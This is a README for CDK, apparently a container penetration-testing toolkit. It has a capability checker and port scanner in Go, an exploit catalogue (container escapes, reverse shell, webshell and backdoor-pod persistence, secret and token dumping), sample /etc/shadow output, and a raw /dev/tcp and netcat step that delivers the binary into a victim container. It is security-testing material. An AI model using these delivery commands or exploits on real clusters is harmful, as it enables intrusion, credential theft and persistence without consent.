CDK

Makes security testing of K8s, Docker and Containerd easier.
CDK - Zero Dependency Container Penetration Toolkit


Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal.
CDK is for security testing purposes only.

Overview

CDK is an open-source container penetration toolkit, designed to offer stable exploitation inside slimmed-down containers without any OS dependency. It ships with useful net-tools and many PoCs/EXPs, and helps you escape the container and take over the K8s cluster.

Quick Start

Run cdk eva (short for cdk evaluate) to gather evaluation info and a recommended exploit, then run cdk run <exploit> to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
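The capability check behind the cdk eva output above (and the "Available Capabilities" evaluate script), as an added Go example that is not CDK's own code: it parses the CapEff mask from /proc/self/status, expands it into capability names, flags the escape-relevant capabilities with the exploit names the page associates with them, and treats a full contiguous capability set as a likely privileged container. The escape-relevant set, the hint strings, the function names and the embedded /proc/self/status sample (Docker's default capability set) are this example's assumptions.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strconv"
	"strings"
)

// capNames maps capability bit number to name in the order of the kernel's
// include/uapi/linux/capability.h (bit 0 = CAP_CHOWN ... bit 40 = CAP_CHECKPOINT_RESTORE).
var capNames = []string{
	"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
	"CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
	"CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK",
	"CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
	"CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE",
	"CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE",
	"CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG",
	"CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
	"CAP_CHECKPOINT_RESTORE",
}

// escapeHints is this example's list of escape-relevant capabilities, each paired with the
// CDK exploit the page names for it (the hint wording is ours, not CDK output).
var escapeHints = map[string]string{
	"CAP_DAC_READ_SEARCH": "read files from the host: cdk run cap-dac-read-search",
	"CAP_SYS_MODULE":      "escape by loading a kernel module",
	"CAP_SYS_ADMIN":       "cgroup/mount escapes: cdk run rewrite-cgroup-devices or mount-cgroup",
	"CAP_SYS_PTRACE":      "ptrace into host processes: cdk run check-ptrace",
}

// sampleStatus is a constructed /proc/self/status excerpt carrying Docker's default
// capability set (CapEff 00000000a80425fb); main falls back to it when /proc is unavailable.
const sampleStatus = "Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\n" +
	"CapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n"

// parseCapEff extracts the effective capability mask from /proc/<pid>/status text.
func parseCapEff(status string) (uint64, error) {
	sc := bufio.NewScanner(strings.NewReader(status))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) == 2 && f[0] == "CapEff:" {
			return strconv.ParseUint(f[1], 16, 64)
		}
	}
	return 0, fmt.Errorf("CapEff line not found")
}

// decodeCaps expands a capability bitmask into the names of its set bits.
func decodeCaps(mask uint64) []string {
	var names []string
	for bit, name := range capNames {
		if mask&(1<<uint(bit)) != 0 {
			names = append(names, name)
		}
	}
	return names
}

// escapeCandidates returns "CAP_X: hint" findings for the escape-relevant caps in mask.
func escapeCandidates(mask uint64) []string {
	var out []string
	for _, name := range decodeCaps(mask) {
		if hint, ok := escapeHints[name]; ok {
			out = append(out, name+": "+hint)
		}
	}
	return out
}

// isFullCapSet reports a contiguous run of ones from bit 0 (mask+1 is a power of two)
// covering at least the 38 capabilities of a pre-5.8 kernel, i.e. what --privileged looks like.
func isFullCapSet(mask uint64) bool {
	return mask >= (1<<38)-1 && mask&(mask+1) == 0
}

func main() {
	status := sampleStatus
	if b, err := os.ReadFile("/proc/self/status"); err == nil {
		status = string(b)
	}
	mask, err := parseCapEff(status)
	if err != nil {
		fmt.Println("[-]", err)
		return
	}
	fmt.Printf("[*] CapEff=%016x enabled=%v\n", mask, decodeCaps(mask))
	for _, finding := range escapeCandidates(mask) {
		fmt.Println("[!]", finding)
	}
	if isFullCapSet(mask) {
		fmt.Println("Critical - Possible Privileged Container Found.")
	}
}
```

The contiguous-ones test rather than a fixed constant keeps the privileged check honest across kernel versions: a 5.4 kernel exposes 38 capabilities (0x3fffffffff) while 5.9+ exposes 41 (0x1ffffffffff), and both are "all caps" for the kernel that produced them.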

Installation/Delivery

Download the latest release from https://github.com/cdk-team/CDK/releases/

Drop the executable into the target container and start testing.

TIPS: Delivering CDK into a target container in real-world penetration testing

If you have an exploit that can upload a file, upload the CDK binary directly.

If you have an RCE exploit but the target container has no curl or wget, you can deliver CDK over a raw TCP connection using bash's /dev/tcp pseudo-device:

  1. On a host you control that the container can reach (a public IP in the usual case), serve the binary with netcat:
(on your host)
nc -lvp 999 < cdk
  2. Inside the victim container, read the stream into a file and make it executable:
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Caveats: /dev/tcp is implemented by bash itself, not the kernel, so step 2 must run under bash (dash and busybox sh do not support it); the port in step 2 must match the listener port in step 1 (999 above); the listener flags differ between netcat implementations (OpenBSD netcat takes the port positionally, nc -l 999); and because the raw stream carries no integrity check, compare a checksum of the received file (for example sha256sum cdk) with the one on your host before running it.

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of etcd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gathers information inside the container to find potential weaknesses.
  2. Exploit: container escaping, persistence and lateral movement.
  3. Tool: network tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command runs the scripts below without local file scanning; use --full to enable all of them (including the Sensitive Local Files scan).

Per-script usage and examples are documented in the CDK wiki (https://github.com/cdk-team/CDK/wiki).

| Tactic | Script | Supported |
|---|---|---|
| Information Gathering | OS Basic Info | ✔ |
| Information Gathering | Available Capabilities | ✔ |
| Information Gathering | Available Linux Commands | ✔ |
| Information Gathering | Mounts | ✔ |
| Information Gathering | Net Namespace | ✔ |
| Information Gathering | Sensitive ENV | ✔ |
| Information Gathering | Sensitive Process | ✔ |
| Information Gathering | Sensitive Local Files | ✔ |
| Information Gathering | Kube-proxy Route Localnet (CVE-2020-8558) | ✔ |
| Information Gathering | DNS-Based Service Discovery | ✔ |
| Discovery | K8s Api-server Info | ✔ |
| Discovery | K8s Service-account Info | ✔ |
| Discovery | Cloud Provider Metadata API | ✔ |

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]

Per-exploit docs are in the CDK wiki (https://github.com/cdk-team/CDK/wiki); "In Thin" marks exploits kept in the thin release.

| Tactic | Technique | CDK Exploit Name | Supported | In Thin |
|---|---|---|---|---|
| Escaping | docker-runc CVE-2019-5736 | runc-pwn | ✔ | ✔ |
| Escaping | containerd-shim CVE-2020-15257 | shim-pwn | ✔ | |
| Escaping | docker.sock PoC (DIND attack) | docker-sock-check | ✔ | ✔ |
| Escaping | docker.sock RCE | docker-sock-pwn | ✔ | ✔ |
| Escaping | Docker API (2375) RCE | docker-api-pwn | ✔ | ✔ |
| Escaping | Device Mount Escaping | mount-disk | ✔ | ✔ |
| Escaping | LXCFS Escaping | lxcfs-rw | ✔ | ✔ |
| Escaping | Cgroups Escaping | mount-cgroup | ✔ | ✔ |
| Escaping | Abuse Unprivileged User Namespace Escaping CVE-2022-0492 | abuse-unpriv-userns | ✔ | ✔ |
| Escaping | Procfs Escaping | mount-procfs | ✔ | ✔ |
| Escaping | Ptrace Escaping PoC | check-ptrace | ✔ | ✔ |
| Escaping | Rewrite Cgroup (devices.allow) | rewrite-cgroup-devices | ✔ | ✔ |
| Escaping | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search | ✔ | ✔ |
| Discovery | K8s Component Probe | service-probe | ✔ | ✔ |
| Discovery | Dump Istio Sidecar Meta | istio-check | ✔ | ✔ |
| Discovery | Dump K8s Pod Security Policies | k8s-psp-dump | ✔ | |
| Remote Control | Reverse Shell | reverse-shell | ✔ | ✔ |
| Remote Control | Kubelet Exec | kubelet-exec | ✔ | ✔ |
| Credential Access | Registry BruteForce | registry-brute | ✔ | ✔ |
| Credential Access | Access Key Scanning | ak-leakage | ✔ | ✔ |
| Credential Access | Etcd Get K8s Token | etcd-get-k8s-token | ✔ | ✔ |
| Credential Access | Dump K8s Secrets | k8s-secret-dump | ✔ | ✔ |
| Credential Access | Dump K8s Config | k8s-configmap-dump | ✔ | ✔ |
| Privilege Escalation | K8s RBAC Bypass | k8s-get-sa-token | ✔ | ✔ |
| Persistence | Deploy WebShell | webshell-deploy | ✔ | ✔ |
| Persistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | ✔ | ✔ |
| Persistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | ✔ | |
| Persistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | ✔ | ✔ |
| Persistence | Deploy K8s CronJob | k8s-cronjob | ✔ | ✔ |

Note about Thin: the thin release is intended for short-lived container shells such as serverless functions. Build tags in the source code cut a few exploits to make the binary lighter: the roughly 2MB file keeps about 90% of CDK's functionality. You can also pick the exploits you need from the CDK source and build your own lightweight binary.

Tool Module

These commands behave like their Linux counterparts, with slightly different input arguments; see the per-command usage docs in the CDK wiki (https://github.com/cdk-team/CDK/wiki).

cdk nc [options]
cdk ps

| Command | Description | Supported |
|---|---|---|
| nc | TCP Tunnel | ✔ |
| ps | Process Information | ✔ |
| netstat | Like "netstat -antup" command | ✔ |
| ifconfig | Network Information | ✔ |
| vi | Edit Files | ✔ |
| ectl | Unauthorized enumeration of etcd keys | ✔ |
| kcurl | Request to K8s api-server | ✔ |
| dcurl | Request to Docker HTTP API | ✔ |
| ucurl | Request to Docker Unix Socket | ✔ |
| rcurl | Request to Docker Registry API | |
| probe | IP/Port Scanning | ✔ |
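The argument format of cdk probe 10.0.1.0-255 80,8080-9443 50 1000 (a last-octet IP range, a comma/dash port spec, a worker count and a per-connect timeout in milliseconds), as an added Go example that is not CDK's implementation: it expands both specs with strict validation, then runs a bounded worker pool of TCP connects and reports the ports that accepted a connection. The function names and the validation rules (only the last octet may be a range, ports 1 to 65535) are this example's assumptions.

```go
package main

import (
	"fmt"
	"net"
	"os"
	"sort"
	"strconv"
	"strings"
	"sync"
	"time"
)

// parseRange accepts "n" or "n-m" and checks the result lies within [minV, maxV].
func parseRange(s string, minV, maxV int) (int, int, error) {
	lo, hi := s, s
	if i := strings.IndexByte(s, '-'); i >= 0 {
		lo, hi = s[:i], s[i+1:]
	}
	a, err1 := strconv.Atoi(lo)
	b, err2 := strconv.Atoi(hi)
	if err1 != nil || err2 != nil || a < minV || b > maxV || a > b {
		return 0, 0, fmt.Errorf("bad range %q (want %d..%d)", s, minV, maxV)
	}
	return a, b, nil
}

// expandIPs turns "10.0.1.0-255" (or a plain IPv4 address) into one address per last octet.
func expandIPs(spec string) ([]string, error) {
	parts := strings.Split(spec, ".")
	if len(parts) != 4 {
		return nil, fmt.Errorf("bad IPv4 spec %q", spec)
	}
	for _, p := range parts[:3] {
		if _, _, err := parseRange(p, 0, 255); err != nil || strings.Contains(p, "-") {
			return nil, fmt.Errorf("bad octet %q in %q (only the last octet may be a range)", p, spec)
		}
	}
	lo, hi, err := parseRange(parts[3], 0, 255)
	if err != nil {
		return nil, err
	}
	prefix := strings.Join(parts[:3], ".")
	ips := make([]string, 0, hi-lo+1)
	for o := lo; o <= hi; o++ {
		ips = append(ips, prefix+"."+strconv.Itoa(o))
	}
	return ips, nil
}

// expandPorts turns "80,8080-9443" into a sorted, de-duplicated port list.
func expandPorts(spec string) ([]int, error) {
	seen := map[int]bool{}
	for _, item := range strings.Split(spec, ",") {
		lo, hi, err := parseRange(strings.TrimSpace(item), 1, 65535)
		if err != nil {
			return nil, err
		}
		for p := lo; p <= hi; p++ {
			seen[p] = true
		}
	}
	ports := make([]int, 0, len(seen))
	for p := range seen {
		ports = append(ports, p)
	}
	sort.Ints(ports)
	return ports, nil
}

// scan dials every ip:port with `parallel` workers and a per-connect timeout and returns the
// addresses that completed a TCP handshake, sorted so output is stable. Refused, filtered
// (timed out) and unreachable targets are all reported as closed.
func scan(ips []string, ports []int, parallel int, timeout time.Duration) []string {
	if parallel < 1 {
		parallel = 1
	}
	jobs := make(chan string)
	var mu sync.Mutex
	var open []string
	var wg sync.WaitGroup
	for i := 0; i < parallel; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for addr := range jobs {
				c, err := net.DialTimeout("tcp", addr, timeout)
				if err != nil {
					continue
				}
				c.Close()
				mu.Lock()
				open = append(open, addr)
				mu.Unlock()
			}
		}()
	}
	for _, ip := range ips {
		for _, p := range ports {
			jobs <- net.JoinHostPort(ip, strconv.Itoa(p))
		}
	}
	close(jobs)
	wg.Wait()
	sort.Strings(open)
	return open
}

// Usage mirrors cdk probe: go run probe.go <ip-spec> <port-spec> <parallel> <timeout-ms>
func main() {
	args := []string{"127.0.0.1", "22,80,443,8080-8090", "20", "500"} // defaults for a local run
	if len(os.Args) == 5 {
		args = os.Args[1:]
	}
	ips, err := expandIPs(args[0])
	if err != nil {
		fmt.Println("[-]", err)
		return
	}
	ports, err := expandPorts(args[1])
	if err != nil {
		fmt.Println("[-]", err)
		return
	}
	parallel, _ := strconv.Atoi(args[2])
	ms, _ := strconv.Atoi(args[3])
	fmt.Printf("[*] %d hosts x %d ports, %d workers, %dms timeout\n", len(ips), len(ports), parallel, ms)
	for _, addr := range scan(ips, ports, parallel, time.Duration(ms)*time.Millisecond) {
		fmt.Println("[+] open", addr)
	}
}
```

The unbuffered jobs channel is deliberate: the producer blocks until a worker is free, so the number of in-flight connections never exceeds the parallel argument, which matters when the container's conntrack or file-descriptor limits are tight.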

Release Document

If you want to know how a new version is released, how the thin build is produced, why upx-packed versions are provided, what the differences are between the all, normal, thin and upx variants, and how to pick specific CDK exploits and tools to compile your own release, see the Release Document.

Developer Docs

  • Run the tests in a container.

Contributing to CDK

First off, thanks for taking the time to contribute!

Thanks for the following contributors:

More contributors: see the Contributors List on GitHub.

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, the error message and the environment, and describe the exact steps that reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
  • Include screenshots or logs from running CDK before and after your fix.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Provide a reproducible environment so the maintainers can review the contribution.
  • Include screenshots showing how the new feature works.
  • If you are contributing a new evaluate/exploit script, add a short doc to your PR message, following the existing exploit docs as the example.

Events

404StarLink 2.0 - Galaxy


Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also an Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/